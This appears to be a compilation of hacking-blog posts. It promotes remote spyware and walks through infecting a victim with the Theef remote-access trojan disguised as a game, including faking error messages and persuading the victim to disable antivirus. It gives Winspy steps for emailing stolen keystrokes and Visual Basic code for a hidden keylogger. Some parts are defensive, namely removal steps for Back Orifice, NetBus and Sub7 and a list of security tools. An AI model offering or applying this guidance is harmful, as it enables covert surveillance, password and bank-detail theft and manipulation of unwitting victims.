Sniper Spy

SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature. Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!

Features

• Remotely Deployable : It means you don’t need to have access of the system on which you need to install it.
• Invisibility Stealth Mode : It can work in invisible mode without the knowledge of the victim.
• Record Login Credentials : It can Records any Password for any Email account or login details of the victim on any website. This can give you access to the victims email or any other web account.

  

• Real Time Screen Viewer : You can see all the activities that is taking place on the victim’s PC.
• Remote Reboot/Shutdown : You can also remotely reboot or shutdown the PC or choose to logoff the current Windows user.
• Bypass Any Firewall : The best part of this software is that it can completely undetectable by any Firewall available till now.
• Actual Screenshots : Captures a full-size jpg picture of the active window however often you wish.
• Websites Visited : Records all website URLs visited in Internet Explorer and Firefox with page title.
• Keystrokes in Most Languages : Every keystroke typed into ANY window is logged, including passwords typed.
• PC Location Mapping : Logs the IP at each upload to show you physical locations of the PC on a map.
• Full Chat Conversations : Records BOTH sides of chats / IMs in Google Talk, Yahoo IM, Windows Live and more.



• Applications Executed : Records every application executed by the user including full path and username.
• Application Session Durations : Shows you how long each application was used including start time and stop time.
• Automatic User File Uploads : Uploads an *actual copy* of every document, picture or desktop file changed.
• File / Folder Changes : Each time a file or folder changes, the software records the action and the full path.

Download

Click Here to buy this Amazing Software Right Now.

Click Here to go to the Official Website of this Software.

Theef is a Windows based application for both the client and server end. The Theef server is a virus that you install on your victims computer, and the Theef client in what you then use to control the virus. The biggest problem with using Theef is that most Anti-Virus programs will pick it up. But with a little bit of social engineering you can generally get people to turn off their AV for you.

Before we begin you need to get a copy of Theef. I have uploaded a copy to Rapid Share here: http://rapidshare.com/files/310301581/theef.zip . If that link does not work, I have posted several others in the forums here

So lets begin. First of all you need a target. This should be relatively easy to find, as I would imagine that the large portion of you reading this article already have someone in mind that you want to hack. If not, feel free to grab a second computer just so you can try this stuff out. For the purpose of this tutorial our victim is named Bob. And we are going to pretend that we are giving him an installer for a game called Awesome Game.

Now you need to convince your victim to turn off their Anti-Virus if they have any. This is because Anti-Virus programs will generally pick up Theef as a virus and delete it. Convincing someone to turn off their Anti-Virus is not often a difficult task, most of the time you can just tell them something along the lines of, &quote;Your Anti-Virus says Awesome Game is a virus, but it isn’t so don’t worry about it.&quote; People are gullible, they want to believe you will cause them no harm, they want to trust you. Use this to your advantage.

The next thing we have to do is configure the program. This is an easy task to do. And to make it easier I will walk you through it using screen shots to help showcase the items you might want to change.

First make a copy of the Theef server. The Theef server is named Server210.exe. Name your copy of the server awesomegame.exe.

Screenshot showing awesomegame.exe is a copy of Server210.exe

Now that we have a copy to work on we need to open up the editor. The server editor is named Editserver210.exe. Once it is opened you should be presented with a window that looks like this:

Screenshot of Theef Server Editor without a server loaded.

From here we need to open up our server for editing using the Load button. Once the server is loaded some values our to be filled into the boxes. The values on the first page can be left alone. In the forums I will be putting up a detailed list of what every option does, but for this tutorial we will only focus on what is needed to give Bob a virus.

To make it look plausible that Awesome Game is indeed a game and not a virus we need to setup a false error message. To do this click Setup->False Error. On this screen check the box to enable false errors, then fill in the Input box labeled text with the following “The installer failed to run!” Your screen should look like this.

Screenshot showing the False Error Screen of the Theef Server Editor

Now the server is ready to be saved and sent. Click the Save button to save the server configuration. The status bar should now say “Finished writing new server settings.” You may now close out of the server editor.

The next step is generally the hardest. You need to send the virus (in our case awesomegame.exe) to your victim and get them to run it. Now for the purposes of our tutorial we have decided to send Bob a “game” by the name of Awesome Game. Little does Bob know that Awesome Game is not a game, but our virus. We have sent Bob Awesome Game using Windows Live Messenger. If your victim is running Vista (like Bob is) then you will need to have them run the virus using Admin privileges.

Now that you have given them the virus the real fun can begin. From here we do everything in the Theef Client. This is the program that you use to control the virus. It is named Client210.exe. You should open it at this point.

Screenshot of Theef Client before connecting to a server.

You will need to get your victims IP address at this point so that you can connect to their computer. This is an easy task to do, and there are numerous ways to accomplish it. For our example we have convinced Bob to go to http://privax.us/ip-test/ and read his IP Address off to us from that page. We could also have gotten him to run ip-config or done any number of other things. If you have no idea what an IP Address is, just direct them to Privax’s IP Test and get them to send you their IP address off the page.

Using one of the aforementioned methods I have determined that Bob’s IP Address is 127.0.0.1 (please note your victim’s IP Address will differ from the address I have used in this example).

I now enter that into the IP input box on the Theef client and press Connect. If you have the correct address and they have run the virus you should see something similar to the following show up in the log box:

[15:56:44] Attempting connection with 127.0.0.1
[15:56:44] Connection established with 127.0.0.1
[15:56:44] Connection accepted
[15:56:44] Connected to transfer port

If you don’t have their IP Address correct or they have not run the virus you will see this instead:

[15:57:37] Attempting connection with 127.0.0.1
[15:57:58] Connection failed (Error: 10060)

Now that we are connected we can start to take do stuff. There are numerous features in Theef so I will only cover a small number of them here. I will likely cover more in the forums as time goes on. Also note that not all features of Theef work, and fewer features will work in Vista than in XP.

One of the most useful features of Theef is the key-logger, which is available under the Spy menu. Upon selecting it a key-logger window will open up as shown.

Screenshot of Theef Keylogger before it logs any keys.

After you click the Start button on this window you will begin to see everything that they type on their computer. This is very useful as it shows you ever password they enter. It is a one stop shop to getting their passwords to everything and things such as their bank account numbers, etc.

There are other features in Theef that can be used for just screwing with people as well. Underneath of the Control Menu there is a button labeled Power. If you click that you will notice an Open/Close CD-ROM Drive button. Most people freak out if their CD-ROM Drive randomly opens and closes without them doing anything.

So this concludes my brief tutorial on how to use Theef. There is a lot more in this program that I covered here, but this should give you the basics on how to get started. Below I have posted two videos showing many more things that Theef can do. If you play these videos at the same time you can see how the client controls the server.

Watch Theef Server in Educational & How-To | View More Free Videos Online at Veoh.com

Watch Theef Client Video in Educational & How-To | View More Free Videos Online at Veoh.com

Love,
Haxor ~Zell Faze~
<3

href="http://www.statcounter.com/joomla/"
target="_blank"> src="http://c.statcounter.com/5351497/0/2e1fd01d/1/"
alt="joomla analytics" />

In my previous article “How To Write A Basic Keylogger In VB” I showed you how to write your own keylogger. Today I will show you how to install a Keylogger on a Remote PC without the knowledge of the owner and you will get all the keystroke information through Email.

Note: This article is for educational purpose only and the author won’t be responsible for any kind of damage caused by following the information given in this article.

Now to install a Keylogger on a Remote Computer you have to follow the steps given below:

1. First of all download Winspy keylogger software from link given below:
   

   http://www.win-spy.com/

2. After downloading this software, run the .exe. You will be asked to register yourself where you will be asked to enter a Userid and Password. Remember this password as it will be required in uninstalling the software.
3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.
4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.
5. Now, Winspy’s main screen will be displayed as shown in image below:
6. Select Remote at top, then Remote install.
7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.
   

   User – type in the victim’s name
   File name – Name the file to be sent. Use the name such that victim will love to accept it.
   File icon – Keep it the same
   Picture – select the picture you want to apply to the keylogger.
   Email keylog to – Enter your Email address. Hotmail and Yahoo doesnot accept Keylog Files so enter other email address.
   Thats it. This much is enough. If you want, can change other settings also.

8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Myspace account password.

So guys, I hope you have got the trick on how to hack any email account passwords from this article. If you have any comment or views about article, feel free to mention it in comments section.

Using these programs any noob can remotely access your computer without any Authentication and do whatever he wants. I will tell you some of the features rest of them you need to try it and find out. These Programs :

• Work as a key logger.
• Send any Information from Victim’s PC to the Hacker’s PC.
• Run any program on the Victims PC.
• Display any Violating Image on victim’s Screen.
• Open the CD Drive of the Victim’s PC.
• Open any Web page on the Victims Screen.
• Disable any Specific Key or whole Keyboard.
• Shutdown Victim’s PC.
• Start a Song on the Victim’s PC.etc.etc…………..

Back Orifice / Back Orifice 2000

Back Orifice is one of the most common backdoor programs, and one of the most deadly. The name may seem like a joke, but sure, the threat is real. Back Orifice was established in Cult of the Dead Cow group. Back Orifice is an Open Source Program. The main Threat of this software is that by making some changes in the code anybody can make it undetectable to the Anti virus Program running on the Victim’s computer. Apart from the strange title, the program usually gets port 31337, the reference to “Lit” phenomenon is popular among hackers.

Back Orifice uses a client-server model, while the server and client is the victim attacker. What makes Back Orifice so dangerous that it can install and operate silently. There is not required interaction with the user in, meaning you could its on your computer right now, and do not know.

Companies such as Symantec have taken steps to protect computers against programs that they consider dangerous. But even more attacks using Back Orifice 2000. This is due partly to the fact that it is still evolving, as open source. As stated in the documentation the goal is ultimately the presence of the Back Orifice 2000 unknown even to those who installed it.

Back Orifice 2000, developed for Windows 95, Windows 98, Windows NT, Windows 2000 and Windows XP.

Where can I download Back orifice 2000?

Back Orifice 2000 can be downloaded at the following address: http://sourceforge.net/projects/bo2k/

I infected! How do I remove it?

Removing Back Orifice 2000 may require that you change the registry settings. To remove it at 7 simple steps, refer to the diagram below.

How do I delete Back orifice 2000

1. Click Start> Run, and type “Regedit”(without the quotes)
2. Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices “
3. Now looking in the right box: “The umgr32 = ‘c: \ windows \ system \ umgr32.exe”
4. Right-click on this entry and click Remove. Now restart your computer.
5. After restarting only open Windows Explorer. Make sure you can see all registered extensions. To do so, select “View Options and configure the appropriate settings.
6. Go to the WINDOWS \ SYSTEM directory, and find “umgr32.exe” file. Once you find it, delete it.
7. Exit Windows Explorer and reboot again.

NetBus / Netbus 2.0 Pro

NetBus was established around the same time that the Back Orifice was in the late 1990′s. NetBus was originally designed as a program prank friends and family, of course anything too malicious. However, the program was released in 1998, and is widely used as a backdoor to manage computer.

Like the Back Orifice, NetBus allows attackers to do virtually everything in the computer victim. It also works well under Windows 9x systems, as well as Windows XP. Unlike Back Orifice, the latest version of NetBus regarded shareware is not free. NetBus is also implementing less stealthy operations, as a direct result of criticism and complaints of abusive use.

Where can I buy and download NetBus?

NetBus can be purchased and downloaded at the following address: http://www.netbus.org/

Ok, I am infected. Now what?

Fortunately, the latest version of NetBus is a valid program. It can be removed just like any other program. Previous issuance NetBus is a bit more tricky, however. If you are not lucky enough attacked with the latest version, the withdrawal process and in the Back Orifice.

How do I remove NetBus?

1. Click Start> Run, and type “Regedit ‘(without the quotes)
2. Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices “
3. Now, in the right box, looking as follows: “[Name_of_Server].”Exe Of course, you have to find the actual name of this file EXE-. Usually This” Patch.exe ‘or’ SysEdit.exe “, but may vary.
4. Reboot and remove all traces of the actual program, which can be left. Additionally, you can set yourself NetBus, and then use its own function disposal.

SubSeven / Sub7

SubSeven or Sub7, has been established for the same purpose was to NetBus pranks. Sub7 actually has more support for pranks, and has more advanced users. Sub7 also widely used by the script kiddies, although that many firewalls and anti-virus software before initialization.

Since Sub7 not supported for several years, the threat is usually very low. Most security programs will not have any problem in ending Sub7 before it has a chance to be started. This shows that the importance to the modernization and security programs is critical, because the money was still there.

Nevertheless, it is widely used by those who have physical access to your firewall, or security programs. If access rights, the tool will work without restrictions.

Where can I buy and download Sub7?

Sub7 not supported more, and hence is not available for download on any legitimate websites. If you were to make a Google search, you would find links to download Sub7. However, this is not the official site, and should be considered dubious and dangerous.

Sounds harmless, How do I remove it?

1. End of the following processes through the curator: “editserver.exe, subseven.exe”
2. Delete the following files: “editserver.exe, subseven.exe, tutorial.txt.”

Why these programs is absolutely legitimate?

All the basis behind these programs is that they are designed to help people, not harm. While some like NetBus really were originally created for pranks, they switched routes to avoid legal problems.

These programs claim to be the legitimate remote desktop program, although they certainly easily used for malicious use. These programs really should be used to aid or customer support departments. Why all adolescents is to copy these programs goes beyond us, but leave the content of their networks, while computer is a good idea.

The advent of new technology has made these programs in some respects less effective. However, programs such as Back Orifice 2000, yet still evolving, so do not be surprised to learn that he works in the background, waiting for instructions. Since the best defense is a good offense, be sure to save a sharp eye on what is installed on the network computers. After all, an ounce of prevention is worth a pound of cure.

Before we start programming, we need to answer a basic question: what is a keylogger? As the name implies (key+logger) – a keylogger is a computer program that logs (records) the keys (keyboard buttons) pressed by a user. This should be simple to understand. Lets say that I am doing something at my computer. A keylogger is also running (working) on this computer. This would mean that the keylogger is “listening” to all the keys I am pressing and it is writing all the keys to a log file of some sort. Also, as one might have guessed already, we don’t want the user to know that their keys are being logged. So this would mean that our keylogger should work relatively stealth and must not, in any case, show its presence to the user. Good, now we know what a keylogger as and we have an idea of its functions, lets move on to the next step.

=========================================
Basic Concepts: What needs to be achieved
=========================================
Ok, now lets plan our program, what should such keyloger do and what it should not. Significant difference to previous section is in the sense that here we shall discuss the LOGIC, the instructions that our program will follow.
Keylogger will:
1 – listen to all the key strokes of the user.
2 – save these keys in a log file.
3 – during logging, does not reveal its presence to the user.
4 – keeps doing its work as long as the used is logged on regardless of users actions.

==========================================
Implementation: Converting logic into code
==========================================
We shall use Visual Basic because it is much easier and simple to understand comparing to C++ or Java as far as novice audience is concerned. Although programmers consider it somewhat lame to code in VB but truthfully speaking, its the natural language for writing hacking/cracking programs. Lets cut to the chase – start your VB6 environment and we are ready to jump the ride!

We need a main form, which will act as HQ to the program.

First of all, as our program shall run, we need to make sure it is hidden. This should be very simple to accomplish:
Private Sub Form_Load()
Me.Visisble = False
End Sub
This makes our program invisible to the human eye. To make it invisible to computers eye too, we need to add this line in the Form_Load() event App.TaskVisible = False . This enabled our logger to run in stealth mode and the regular Task Manager will not see our application. Although it will still be possible to see it in the processes tab, there are “ways” to make it hidden. Figure them out yourself, they have nothing to do with programming.

OK, now that our program has run in stealth mode, it should do its essential logging task. For this, we shall be using a whole load of API. These are the interfaces that the Application Platform (windows) itself provides us in those annoying dll files.

There are 3 methods to listen for keys:
* GetAsyncKeyState
* GetKeyboardState
* Windows Hooks

Althought the last method is easier to use, this will not work on Windows98 and also it is NOT very precise. Many people use it, but as my experiences revealed, Keyboard Hooks are only a good way of blocking keys and nothing else. The most exact and precise method in my experience is GetAsyncKeyState().
So lets use this function, but where is that damn thing and how to use it?

Private Declare Function GetAsyncKeyState Lib “USER32″ (ByVal vKey As Long) As Integer
This is how we use a function already present in a dll file. In this case we are using the user32.dll and the function we are using is GetAsyncKeyState(). The arguments (Long vKey), and return value (Long) shall be discussed later, right now its enough to know that this function can listen to keystrokes.

What we need next is to run this function infinitely (as long as the system is running). To do this, just put a Timer control on the form and name it tmrTimer. This timer is used to run the same line of code forever. Note that a while loop with a universally true condition would also accomplish same, but the while loop will certainly hang the system and will lead to its crash as opposed to timer. Timer will not hang the system at all because a while loop tends to carry out the instruction infinitely WITHOUT any break and it also keeps the control to itself, meaning that we cannot do any other job as the loop is running (and with a universally true statement, the while loop will not let the control pass to ANYWHERE else in the program making all the code useless) while the Timer control just carries out the instuction after a set amount of time.

So the two possibilities are:

Do While 1=1
‘our use of the GAKS (GetAsyncKeyState) function Loop

and

Private Sub tmrTimer_Timer()
‘our use of the GAKS function
End Sub

Timer being set, lets move on to see how the GAKS function works and how are we going to use it. Basically what the GAKS function does is that it tells us if a specific key is being pressed or not. We can use the GAKS function like this: Hey GAKS() check if the ‘A’ key is being pressed. And the GAKS function will tell us if it is being pressed or not. Sadly, we can’t communicate with processors like this, we have to use some flamboyant 007 style

If GAKS(65)<>0 Then
Msgbox “The ‘A’ key is being pressed”
Else
Msgbox “The ‘A’ key is not being pressed”
End If

Now lets see how this code works: GAKS uses ASCII key codes and 65 is the ASCII code for ‘A’ If the ‘A’ key is being pressed then GAKS will return a non-zero value (often 1) and if the key is not being pressed then it will return 0. Hence If GAKS(65)<>0 will be comprehended by the VB compiler as “If the ‘A’ key is being pressed”.

Sticking all this stuff together, we can use this code to write a basic functional keylogger:

Private Sub tmrTimer_Timer()
Dim i As Integer
Static data As String
For i = 65 to 90 ‘represents ASCII codes from ‘A’ to ‘Z’
If GAKS(i)<>0 Then data = data & Chr(i)
Next i
If GAKS(32) <> 0 Then data = data & ” ” ‘checking for the space bar
If Len(data)>=100 Then
Msgbox “The last 100 (or a couple more) are these ” & VBNewLine & data
data = “”
End If
End Sub

This alone is enough to create a basic functioning keylogger although it is far from practical use. But this does the very essential function of keylogger. Do try it and modify it to your needs to see how GAKS works and how do the Timer delays affect the functionality of a keylogger. Honestly speaking, the core of our keylogger is complete, we have only to sharpen it now and make it precise, accurate and comprehensive.
The first problem that one encounters using GAKS is that this function is far too sensitive than required. Meaning that if we keep a key pressed for 1/10th of a second, this function will tell us that the key has been pressed for at least 2 times, while it actually was a sigle letter. For this, we must sharpen it. We need to add what I call “essential time count” to this function. This means that we need to tell it to generate a double key press only if the key has been pressed for a specified amount of time. For this, we need a whole array of counters. So open your eyes and listen attentively.

Dim count(0 to 255) As Integer
This array is required for remembering the time count for the keys. i.e. to remember for how long the key has been pressed.

Private Sub tmrTimer_Timer()
Dim i As Integer
Const timelimit As Integer = 10
Static data As String
For i=0 To 255 ‘for all the ASCII codes
If GAKS(i)<>0 Then
If count(i) = 0 Then ‘if the key has just been pressed
data = data & Chr(i)
ElseIf count(i) < timelimit Then
count(i) = count(i) + 1 ‘add 1 to the key count
Else
count(i) = 0 ‘initialize the count
data = data & Chr(i)
End If
Else ‘if the key is not being pressed
count(i) = 0
End If
Next i
End Sub

What we have done here is that we have set a time limit before the GAKS function will tell us that the key is being pressed. This means, in simple words, that if we press and hold the ‘A’ key, the GAKS function will not blindly tell us the ‘A’ key is being pressed, but it will wait for sometime before telling us again that the key is being pressed. This is a very important thing to do, because many users are not very fast typists and tend to press a key for somewhat longer than required.

Now what is left (of the basic keylogger implementation) is just that we write the keys to a file. This should be very simple:

Private Sub timrTimer_Timer()
‘do all the fuss and listen for keystrokes
‘if a key press is detected
Open App.Path & “\logfile.txt” For Append As #1
Print #1, Chr(keycode);
Close #1
End Sub

Note that this is the very basic concept of writing a keylogger, we have yet not added autostart option and neither have we added an post-compile functionality edit options. These are advanced issues for the beginners. If you would like me to write about them, do tell me and I will write about them too, step by step. Please do comment on this article, telling me what it lacks and what was not required in it. Feel free to post this anywhere you like, just make sure you don’t use it for commercial purposes. If you have any questions about any part of it let me know and I will try to answer.

1. nmap – Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available.

2. Nikto – Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

3. THC-Amap – Amap is a next-generation tool for assistingnetwork penetration testing. It performs fast and reliable application protocol detection, independant on the TCP/UDP port they are being bound to.

4. Ethereal – Ethereal is used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product.

5. THC-Hydra – Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

6. Metasploit Framework – The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This project initially started off as a portable network game and has evolved into a powerful tool for penetration testing, exploit development, and vulnerability research.

7. John the Ripper – John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

8. Nessus – Nessus is the world’s most popular vulnerability scanner used in over 75,000 organisations world-wide. Many of the world’s largest organisations are realising significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

9. IRPAS – Internetwork Routing Protocol Attack Suite – Routing protocols are by definition protocols, which are used by routers to communicate with each other about ways to deliver routed protocols, such as IP. While many improvements have been done to the host security since the early days of the Internet, the core of this network still uses unauthenticated services for critical communication.

10. Rainbowcrack – RainbowCrack is a general propose implementation of Philippe Oechslin’s faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called “rainbow table”.